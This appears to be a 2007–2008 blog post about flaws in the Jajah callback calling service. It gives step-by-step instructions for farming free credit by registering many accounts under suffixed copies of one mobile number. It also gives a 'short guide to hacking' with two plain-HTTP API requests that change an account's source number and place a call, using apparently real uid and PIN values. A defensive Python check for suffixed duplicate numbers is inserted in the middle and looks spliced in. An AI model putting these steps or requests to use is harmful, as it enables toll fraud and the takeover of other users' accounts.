Jajah

Published on May 6, 2007

Jajah provides a cheap way to make calls using a callback service. No doubt it is a great web/mobile application, since it can save a lot of money! But Hoiio is better.

Moment of truth B

Another flaw with Jajah is that it allows a user to create an unlimited number of accounts with the same mobile number. Too bad they give only $0.25 USD free ):

  1. Register a new account with any name, email and a username that you can remember
  2. Enter your mobile number, but add a suffix, e.g. if your number is 99998888, then enter 999988881
  3. Repeat with a different suffix, e.g. 999988882

[Accurate as of Feb 2008]
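
One way a registration backend could catch this, as an added example (not Jajah's code): treat a new number as a duplicate when it equals, extends, or is a prefix of a number already registered. It assumes the suffixed number still reaches the same phone because the network ignores the extra trailing digits; `PhoneRegistry` and `MIN_DIGITS` are hypothetical names.

```python
import bisect
import re

# Assumption: shortest valid subscriber number, matching the page's 99998888.
MIN_DIGITS = 8


class PhoneRegistry:
    """Registered numbers, kept sorted so prefix collisions are cheap to find."""

    def __init__(self):
        self._numbers = []  # sorted list of digit strings

    @staticmethod
    def normalize(raw):
        # Drop spaces, dashes, '+' and anything else that is not a digit.
        return re.sub(r"\D", "", raw)

    def find_conflict(self, raw):
        """Return the registered number that `raw` collides with, or None."""
        n = self.normalize(raw)
        # Case 1: a registered number equals n or is a prefix of n
        # (n = registered number + extra suffix digits).
        for end in range(MIN_DIGITS, len(n) + 1):
            i = bisect.bisect_left(self._numbers, n[:end])
            if i < len(self._numbers) and self._numbers[i] == n[:end]:
                return self._numbers[i]
        # Case 2: n is a prefix of a registered number (the suffixed form was
        # registered first). In sorted order such a number sits right at n's slot.
        i = bisect.bisect_left(self._numbers, n)
        if i < len(self._numbers) and self._numbers[i].startswith(n):
            return self._numbers[i]
        return None

    def register(self, raw):
        n = self.normalize(raw)
        if len(n) < MIN_DIGITS:
            raise ValueError("number too short")
        conflict = self.find_conflict(n)
        if conflict is not None:
            raise ValueError(f"{n} collides with registered number {conflict}")
        bisect.insort(self._numbers, n)
        return n


if __name__ == "__main__":
    reg = PhoneRegistry()
    reg.register("99998888")
    for attempt in ("999988881", "999988882", "99997777"):  # constructed inputs
        print(attempt, "->", reg.find_conflict(attempt) or "ok")
```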

Moment of truth A

But there are many serious flaws with Jajah. They have no security. Absolutely zero. We just need to sniff their traffic and we will be able to figure out how to make a call and transfer credit. Here is a very short guide to hacking them. Figure out the rest yourself!

The HTTP queries (sent over plain HTTP, with the uid and PIN in the query string):

Step 1: Change source number
http://www.jajah.com/engine/MobileAPI.aspx?message=mob-number-change;new-number=006597282928;type=mob-HTTP;uid=3021031;PIN=53749467;l=en;pt=0;v=0.3.3

Step 2: Call!
http://www.jajah.com/engine/MobileAPI.aspx?message=CALL;dest=006593836208;type=mob-HTTP;uid=3021078;PIN=53749467;l=en;pt=0;v=0.3.3

[Accurate as of August 2007]

Found a Little Bug
